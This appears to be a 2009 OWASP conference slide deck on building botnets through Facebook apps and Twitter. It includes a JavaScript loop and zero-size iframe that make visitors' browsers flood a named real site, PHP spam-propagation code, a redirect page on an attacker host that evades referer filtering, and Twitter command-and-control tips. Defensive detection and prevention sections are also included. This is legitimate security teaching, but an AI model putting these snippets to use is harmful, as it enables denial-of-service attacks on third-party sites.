Facebook, Twitter and Botnets
OWASP Turkey Chapter, September 26 2009, Istanbul
Botnet
• A collection of software robots, or bots, that run autonomously and automatically
• A botnet in its simplest form is an army of compromised computers that take orders from a botherder
• Botnets are arguably the biggest threat the Internet community has faced
• Most popular botnet type: IRC channel based botnets
• Lately: social networking site based botnets
Puppetnet
• Puppetnets rely on websites that coerce web browsers into participating in malicious activities
• Such activities include
  – distributed denial-of-service
  – worm propagation
  – reconnaissance probing
• Puppetnets exploit the high degree of flexibility granted to the mechanisms comprising the web architecture
• A website under the control of an attacker can thereby transform a collection of web browsers into a distributed system that is effectively controlled by the attacker
• Puppetnets can instruct any web browser to engage in malicious activities
Puppetnet
• Participation in puppetnets is dynamic
• Users join and participate unknowingly while surfing the net
• Easy to maintain a reasonable population, without the burden of having to look for new victims
• Harder for defenders to track and filter out attacks, as puppets are likely to be relatively short-lived
• Only indirectly misuse browsers to attack third parties
• http://www.ics.forth.gr/dcs/Activities/papers/TISSEC.puppetnets.2007.pdf
Puppetnet Diagram
(Diagram labels: Malicious web server; HTTP requests and responses that also carry the attack commands; Attack traffic; Victim site; Web clients)
What can be done via Puppetnets
• Image references
• Loading image objects through JavaScript
• Opening pop-up windows
• Creating frames to load remote objects
* No browser imposes restrictions on the location or type of the target referenced through these mechanisms
Puppetnet DDoS
• Firepower of a DDoS attack = (number of users concurrently viewing the malicious page in their web browser) × (amount of bandwidth each of these users can generate towards the target server)
• What is more important?
  – Size of the puppetnet?
  – Sufficient firepower for a typical DDoS scenario?
• Determine how much traffic a browser can typically generate under the attacker's command
Facebook
• Facebook is a global social networking website that is operated and privately owned by Facebook, Inc.
• Users can
  – add friends
  – send them messages
  – update their personal profiles to notify friends about themselves
  – join networks organized by city, workplace, school, and region
Application Development in Facebook
• Options while creating Facebook applications
  – Option 1: Port an existing application to Facebook by using an iframe
  – Option 2: Develop an application by using FBML, FBJS, FQL and the FB API
• Create an application in Facebook
  • Facebook API
  • Facebook Markup Language (FBML)
  • Facebook Query Language (FQL)
  • Facebook JavaScript (FBJS)
Facebook Application (How does it work?)
– Callback metaphor to interact with applications
– The URL of the application is associated with a registered application in Facebook
– When the Facebook application URL is requested, Facebook redirects the request to the application's server
– The application processes the request and communicates with Facebook using the Facebook Application Programming Interface (API) or Facebook Query Language (FQL)
– It returns Facebook Markup Language (FBML) to Facebook for presentation
Facebook Dynamics
• Facebook API
  – Web services programming interface for accessing core services
    • profile
    • friends
    • group
    • event
    • photo
  – Performs other Facebook-centric functionality
    • log in
    • redirect
    • update view
• Facebook Markup Language (FBML)
  – HTML-like language
  – Displays pages inside the Facebook canvas
Facebook Dynamics
• Facebook Query Language (FQL)
  – SQL-based interface into Facebook data
  – Similar to standard SQL
  – Access to many Facebook database tables
    • user
    • friend
    • group_member
    • event_member
    • photo
    • album
    • photo_tag
  – Restrictions
    • SELECT statements must be performed one table at a time
    • Join queries are not permitted
    • Queries must be indexable
Facebook Dynamics
• Facebook JavaScript (FBJS)
  – Allows limited scripting functionality
  – Alternative DOM implementation
  – Similar to standard JavaScript
  – Differs from standard JavaScript
    • When accessing a JavaScript property (such as document.href), FBJS uses a pair of get and set methods instead (getHref, setHref)
    • When processing scripting code inside script elements, it tacks the application ID onto function and variable names
    • This prevents running arbitrary JavaScript
    • FBJS is transformed on the fly into JavaScript as the page is loaded
    • All variables and functions are prepended with a string like "xyz3455679_"
    • Restrictions on what can be done with DOM elements
    • Avoids cross-site scripting attacks and hostile user behavior
Facebook Platform
• Standards-based programming framework
  – Enables developers to create applications that interact and integrate with core Facebook services
  – Facebook applications are not installed directly onto the Facebook server. Instead, they are placed on the developer's server
  – Facebook applications are called by Facebook when the application URL is requested
Facebook Application Diagram (How does it work?)
1. The Facebook server receives a URL request for the application (apps.facebook.com/uygulama, i.e. the application's name)
2. Facebook calls the callback URL on the server where the application is hosted
3. The application evaluates the request, obtains Facebook data from Facebook via the API or FQL, and sends it back to Facebook as FBML for the user to see
4. Facebook receives the FBML response, renders it inside the Facebook canvas and sends the HTML to the browser that initiated the request
What kind of a Facebook Application?
• A simple application?
• A popular application?
• Game or utility?
• Fan based program?
• Continuous usage?
• A program that creates programs?
• TOS?
Facebook - TOS
• http://www.facebook.com/terms.php
  – Privacy
  – Sharing Your Content and Information
  – Safety
  – Registration and Account Security
  – Protecting Other People's Rights
  – Mobile
  – Payments
  – Special Provisions Applicable to Share Links
  – Special Provisions Applicable to Developers/Operators of Applications and Websites
  – About Advertisements on Facebook
  – Special Provisions Applicable to Advertisers
  – Special Provisions Applicable to Pages
Facebook - TOS - Safety
• You will not upload viruses or other malicious code.
• You will not collect users' content or information, or otherwise access Facebook, using automated means (such as harvesting bots, robots, spiders, or scrapers) without our permission.
• You will not use Facebook to do anything unlawful, misleading, malicious, or discriminatory.
• You will not do anything that could disable, overburden, or impair the proper working of Facebook, such as a denial of service attack.
Facebook - TOS - Provisions Applicable to Developers
• Special Provisions Applicable to Developers/Operators of Applications and Websites
  – You will only request data you need to operate your application.
  – You will not use, display, or share a user's data in a manner inconsistent with the user's privacy settings.
  – You will delete all data you received from Facebook if we disable your application or ask you to do so.
Facebook Revocation Email
Botnet Creation in Facebook
• Image reference – inline linking
  – Use of a linked object (usually an image) from one site in a web page belonging to a second site
  – The second site is said to have an inline link to the site where the object is located
• When a web site is visited
  – The browser first downloads the textual content in the form of an HTML document
  – The downloaded HTML document may call for other HTML files to be processed
  – It also permits absolute URLs that refer to images hosted on other servers (<img src="http://www.example.com/picture.jpg" />)
  – When a browser downloads an HTML page containing such an image, it contacts the remote server to request the image content
Botnet Creation in Facebook
• Image reference
  – A single line like
    echo '<fb:iframe border="0" width="0px" height="0px" src="http://www.w3schools.com/js/venus.jpg" />';
  – is enough to create a DDoS attack against the src victim site, w3schools.com in the above example
  – An fb:iframe that downloads an image with width and height set to 0px
  – The browser fetches the page above and does not show it
  – Change the width and height and the picture becomes visible
Botnet Creation in Facebook
• How to create a large number of requests to the target site?
  – Embed a sequence of image references in the malicious web page, which can be done using either a sequence of IMG SRC instructions or a JavaScript loop that instructs the browser to load objects from the target server
  – Loading image objects through JavaScript:
    <SCRIPT>
    pic = new Image(10, 10);
    function DDOS() {
      var now = new Date();
      pic.src = 'http://www.w3schools.com/js?' + now.getTime();
      setTimeout("DDOS()", 10);
      return;
    }
    </SCRIPT>
    <IFRAME name='parent' width="0%" src="page.htm" onLoad="DDOS()"></IFRAME>
Propagation of Facebook Botnet
• Create an application
• Make it nice and fun! (Really important)
• Advertise it by using Facebook features:
  – News Feed
  – Invitation (limit 20 a day)
    $invite_text = htmlentities($invite_text);
    echo "<fb:request-form type='Kim Silmis' content='$invite_text' action='index.php' method='POST' invite='true' >";
    echo "<fb:multi-friend-selector showborder='true' max='20' actiontext='Kim Silmiş programı ile sizi arkadaş listesinden silenleri görmek ister misiniz?' exclude_ids='$exclude_list' >";
    echo "</fb:request-form>";
  – Notification
    $facebook->api_client->notifications_send($friends[1], 'Kim silmis kullaniyor. Siz de <a href="http://apps.facebooks.com/kilsilmis">Kim silmis</a> kullanarak zevkle zaman geçirebilirsiniz.');
Detection of Facebook Botnet
• The victim host must filter out all incoming traffic introduced by Facebook users
  – Use the Referer field of the HTTP requests
  – Determine whether a request originates from facebook.com or not
  – Stop the attack traffic accordingly
• It is possible for a Facebook application developer to overcome this situation by pointing the image source at an intermediate page that redirects to the victim:
    src=http://attack-host/dummy-page?ref=victim-host/image1.jpg
    <?php
    if ($_GET["ref"]) { $ref = $_GET["ref"]; }
    print("<meta http-equiv='refresh' content='0; url=$ref'>");
    ?>
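An added example (not code from the presentation) of the referer check described on this slide, run on the victim side over its access log. It assumes Apache "combined" log format and uses constructed sample lines; besides the facebook.com Referer it also looks for the bare Date.getTime() cache-busting query string from the JavaScript loop slide, because that pattern is still visible after the meta-refresh trick above has hidden the Facebook referer.

```python
import re
from collections import defaultdict

# Constructed Apache "combined" log lines (sample data, not from the talk).
SAMPLE_LOG = """\
10.0.0.1 - - [26/Sep/2009:10:00:00 +0300] "GET /js/venus.jpg HTTP/1.1" 200 5120 "http://apps.facebook.com/someapp/" "Mozilla/5.0"
10.0.0.2 - - [26/Sep/2009:10:00:00 +0300] "GET /js?1253948400123 HTTP/1.1" 404 210 "http://apps.facebook.com/someapp/" "Mozilla/5.0"
10.0.0.2 - - [26/Sep/2009:10:00:00 +0300] "GET /js?1253948400134 HTTP/1.1" 404 210 "-" "Mozilla/5.0"
10.0.0.3 - - [26/Sep/2009:10:00:01 +0300] "GET /js?1253948401001 HTTP/1.1" 404 210 "http://attack-host/dummy-page" "Mozilla/5.0"
10.0.0.3 - - [26/Sep/2009:10:00:01 +0300] "GET /js?1253948401012 HTTP/1.1" 404 210 "http://attack-host/dummy-page" "Mozilla/5.0"
10.0.0.4 - - [26/Sep/2009:10:00:01 +0300] "GET /index.html HTTP/1.1" 200 8000 "http://www.google.com/" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
                    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$')
# The slide's filter: does the request originate from facebook.com (any subdomain)?
FACEBOOK_REFERER = re.compile(r'^https?://([^/.]+\.)*facebook\.com(/|$)', re.I)
# The JavaScript loop's cache-busting Date.getTime() suffix; this survives a meta
# refresh through an attacker page that hides the Facebook referer.
CACHE_BUSTER = re.compile(r'\?\d{10,}$')

def classify(line):
    """Parse one log line; return (ip, target, [indicators]) or None if unparseable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    indicators = []
    if FACEBOOK_REFERER.match(m['referer']):
        indicators.append('facebook-referer')
    if CACHE_BUSTER.search(m['target']):
        indicators.append('cache-buster')
    return m['ip'], m['target'], indicators

def analyze(log_text, cache_buster_threshold=2):
    """Return {ip: indicators} for clients that behave like puppets: one
    facebook.com referer suffices; cache-busted fetches must repeat to count."""
    counts = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        parsed = classify(line)
        if parsed is None:
            continue
        ip, _target, indicators = parsed
        for name in indicators:
            counts[ip][name] += 1
    flagged = {}
    for ip, c in counts.items():
        hits = [name for name, minimum in (('cache-buster', cache_buster_threshold),
                                           ('facebook-referer', 1)) if c[name] >= minimum]
        if hits:
            flagged[ip] = hits
    return flagged
```

The flagged client list is what a rate limiter or firewall rule would consume; 10.0.0.3 in the sample is caught only by the cache-buster pattern, which is the case the referer filter alone misses.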
Prevention of Facebook Botnet
• Social network providers should be careful with the use of client-side technologies like JavaScript
• The social network operator should provide developers with a strict API that gives access only to resources related to the system
• Applications should run in an isolated environment imposing constraints that prevent the application from interacting with other Internet hosts
• The Facebook Platform should cancel the use of the fb:iframe tag, as this tag is used to load images hosted at the victim host
Facebook PoC: Facebot
• www.ics.forth.gr/dcs/Activities/papers/facebot.isc08.pdf
Twitter
• Free social networking and micro-blogging service
• Enables users to send and read messages known as tweets
• Tweets are text-based posts of up to 140 characters displayed on the author's profile page and delivered to the author's followers
• Senders can restrict delivery to those in their circle of friends or allow open access
Twitter
• Profile (Name, Location, Bio)
• Find People (Twitter, Other Networks, Emails, Suggested Users)
• @
• RT
• Direct Message
• #
• http://search.twitter.com
• Favorites
• RSS
Twitter Botnet?
• Reasons
  – Ability to hide random commands in the large amount of data that is generated each day
  – A really good API that would make integration easy
• Ideas
  – Option 1: A protected Twitter account that only the bots could read
    • Restriction on who could see the commands?
    • Easy for Twitter to block the user
    • PoC supposedly exists
  – Option 2: Send commands to random accounts and then have the bot use the search feature to find the commands
    • Harder for Twitter to block the messages, as the commands could be posted from any account to any other account
    • The bot would have to have a way to spot the commands in the general mess of other tweets out there
    • If the bot can spot the commands, then Twitter could also do the same matching and automatically drop those tweets
    • Use seemingly innocent commands, such as "check out this link..." instead of saying download a file
    • Innocent commands would be hard for Twitter to block without upsetting legitimate users
• Additional suggestions
  – Using TinyURL to obfuscate commands
  – Using hash tags to represent certain things
  – Making bots follow certain accounts to mark themselves as bots
Twitter - PoC
• Proof of concept bot which uses Twitter as its command and control channel: http://www.digininja.org/projects/kreiosc2.php
• Waiting for the Defcon 2009 video, presented by Kevin Johnson and Tom Eston
Thank you
• Ibrahim Halil Saruhan
• Facebook: halilsaru@gmail.com
• E-mail: ibrahimsaruhan@gmail.com
Questions?